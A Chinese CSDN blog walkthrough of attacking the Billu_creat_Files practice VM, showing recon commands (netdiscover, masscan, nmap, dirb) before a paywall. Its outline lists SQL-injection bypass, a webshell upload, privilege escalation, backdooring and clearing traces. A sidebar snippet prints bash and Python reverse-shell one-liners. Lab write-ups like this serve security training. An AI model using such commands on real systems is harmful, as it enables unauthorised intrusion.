靶机渗透测试实战(八)——Billu_creat_Files渗透实战

最新推荐文章于 2024-08-11 20:47:36 发布
最新推荐文章于 2024-08-11 20:47:36 发布
阅读量2.8k 收藏 23
点赞数 1
分类专栏: kali Linux 渗透测试 靶机渗透测试实战 文章标签: Billu_creat_Files靶机 靶机实战 Kali Linux渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38684504/article/details/90107074
版权
本文详述了一次针对Billu_creat_Files靶机的渗透测试过程,包括信息收集、端口扫描、80端口的HTTP服务分析,以及SQL注入、上传图片木马、反弹shell、提权等步骤,最终实现对靶机的完全控制。
摘要由CSDN通过智能技术生成

目录

一. 实验环境

二. 实验流程

三. 实验步骤

(一)信息收集——主机发现

1. 查看Kali的IP信息;(IP:192.168.37.131)

2. 扫描主机(netdiscover)

(二)信息收集——端口扫描

1. 扫描端口(masscan)

2. 详细扫描端口信息(nmap)

(三)渗透测试

80端口(http服务)

     1. 访问目标靶机的80端口

     2. 网站目录扫描(dirb)

     3. 查看扫描到的网站目录

     4. 登录数据库;

     5. 方式2:SQL注入绕过登录;

     6. 上传图片木马;

     7. 反弹shell;

     8. 提权

     9. 方式2获取shell并提权

     10. 留后门,清痕迹;

四. 实验总结

一. 实验环境

  • 靶机:Billu_creat_Files,IP地址暂时未知;
  • 测试机:Kali,IP地址:192.168.37.131;
  • 测试机:物理机win7;

二. 实验流程

  • 信息收集——主机发现
  • 信息收集——端口扫描
  • 渗透测试

三. 实验步骤

(一)信息收集——主机发现

1. 查看Kali的IP信息;(IP:192.168.37.131)

2. 扫描主机(netdiscover)

netdiscover -i eth0 -r 192.168.37.0/24

Netdiscover: -i 指定网卡 -r 指定网段

(二)信息收集——端口扫描

1. 扫描端口(masscan)

masscan --rate=10000 --ports 0-65535 192.168.37.147

扫描发现目标开放了22,80端口;

2. 详细扫描端口信息(nmap)

nmap -T4 -sV -O -p 22,80 192.168.37.147

22(ssh),80(http);

(三)渗透测试

80端口(http服务)

1. 访问目标靶机的80端口

1.1> 查看http服务首页信息;

http://192.168.37.147

1.2> 尝试使用弱口令登录;

登录失败;发现该登录页面没有验证码和登录次数的限制,可以尝试使用暴力破解;

2. 网站目录扫描(dirb)

dirb http://192.168.37.147

尝试拿大字典扫描

最低0.47元/天 解锁文章
橘子女侠
关注
专栏目录
billu靶机渗透测试过程
weixin_46429206的博客
10-20 2386
一、主机探测 我们可以推断出目标主机ip为192.168.159.135 二、端口扫描 发现有开启80和22端口 三、扫描端口开放的服务 四、扫描版本和系统信息 五、用dirb扫描80端口目录 六、用浏览器打开全部链接 发现可以利用的有 其中在phpinfo()中发现开启了本地文件包含,关闭了远程文件包含 七、判断如何进一步获取shell 这个地方主要是登录框,提示存在sql注入。试了一段时间发现进不去,我们在目录扫描时发现了index.php这个文件,看看里面有啥。但是想查看文件我们得找到
靶机实战-Billu_creat_Files
滕财然的博客
01-20 869
Billu_creat_Files靶机实战 文章目录Billu_creat_Files靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、80端口--http服务5、提权6、提权方式2 1、主机发现 目标IP:192.168.232.155 2、端口扫描 目标开放了22、80端口 3、端口详细信息扫描 22端口–ssh、80端口–http服务 4、80端口–http服务 访问主页: 只...
billu_b0x2 靶机渗透实战
n5xxxx__zy的博客
07-23 707
目标靶机ip:192.168.146.140, 目的是获得root权限 1.信息收集 开放了四个端口 22 80 111 8080 80端口用Drupal框架搭的站 用dirb扫一下目录 很多目录 进去看看有没有有用的信息 这东西不知道干嘛用的 先留着 目录跑了半天终于跑完了发现了一个页面 去查查Drupal8.3.5有没有可以利用的漏洞 打开神器 search drupal...
West-Wild-v1.1靶机渗透测试
最新发布
weixin_58786230的博客
08-11 287
【代码】West-Wild-v1.1靶机渗透测试
Billu_creat_Files 靶机渗透
weixin_44769042的博客
10-17 568
靶机练习--5 目录 主机发现 端口扫描 端口服务版本,操作系统扫描 web端开找 目录扫描 找找有用的 phpmyadmin getshell 提权 附加 1.在phpmyadmin默认配置里找到root的密码 2.通过代码审计来绕过主页sql注入的限制 总结 主机发现 端口扫描 端口服务版本,操作系统扫描 22 ssh可尝试暴力破解 apache可查询其版本漏洞 web端开找 一个登陆点 尝试弱口令,万能密码sql注入 ...
[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-23 1150
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
php靶机网站,JIS-CTF靶机 Kioptrix靶机渗透
weixin_30679293的博客
03-25 523
前言JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。靶机下载/搭建:靶机1:https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw靶机2:http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar开始:JIS靶机全解:探测网络, IP:192.168.1.135...
靶场渗透(一)——billu_b0x渗透
Ramona的博客
07-29 1122
测试环境 靶机billu_b0x 打开虚拟机后设为nat模式 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22...
Billu_b0x的渗透测试
Cper的博客
10-26 582
靶场的测试实践和不同思路
【VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 1077
靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1045
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
phpstudy靶机搭建
bbdwjy的博客
04-29 287
第零步:拥有一个虚拟机vm。
php 靶机,php反序列化靶机serial实战
weixin_39552037的博客
03-10 384
靶机描述今天研究一下php反序列化,靶机serial实战。目标为获取root权限。靶机信息可以去vulhub上下载此靶机:https://www.vulnhub.com/entry/serial-1,349/下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。 ...
php mysql注入靶机_SQL注入靶机实例
weixin_42365510的博客
01-30 241
打开靶机右键源代码 习惯搜一下index 发现php 大概率为MYSQL数据库点击index.php后发现新建一个网页和之前的一样 结论这个index.php就是靶机判断是否存在注入点发现url上有id=1 又是MYSQL数据库 心中窃喜 就可以想到select * from [表] where id=[任何数字]接下来把id=后改成0+1 看看有没有发现果然有戏 发现跟原来界面相同 说明0...
Pikachu靶场-PHP反序列化
天行健,君子以自强不息
12-31 259
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Python程序设计——安全渗透测试的常见模块
bluepangzi的博客
03-29 990
安全渗透测试的常见模块一、Socket 模块1.实例化 Socket 类2.Socket常用的函数—服务端函数bind():listen():accept():3.客户端的函数send():sendall():recv():sendto():recvfrom():4.使用Socket编写一个简单的服务端和客户端二、python-nmap模块1.python-nmap安装过程2.python-nmap模块类的实例化PortScanner类3.python-nmap模块中的函数scan()函数:参数hosts参
python 渗透测试基础-网络通讯
慕容卡卡
03-23 1276
本文转载自【 python 渗透测试基础-网络通讯】https://www.lzfkj.vip/post/20 文章目录python 渗透测试基础-网络通讯简述TCP实例TCP 服务端TCP 客户端运行结果TCP的另外一个客户端TCP的SSL请求客户端UDP实例UDP 服务端UDP 客户端 python 渗透测试基础-网络通讯 简述     在很多情况下,我们所在的测试环境并没有给我们提供很多有利的条件,特别是在一些审计等级高的地方,更是直接断开物理连接;除了这个方式
渗透中反弹shell与端口
千寻的博客
01-03 1831
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值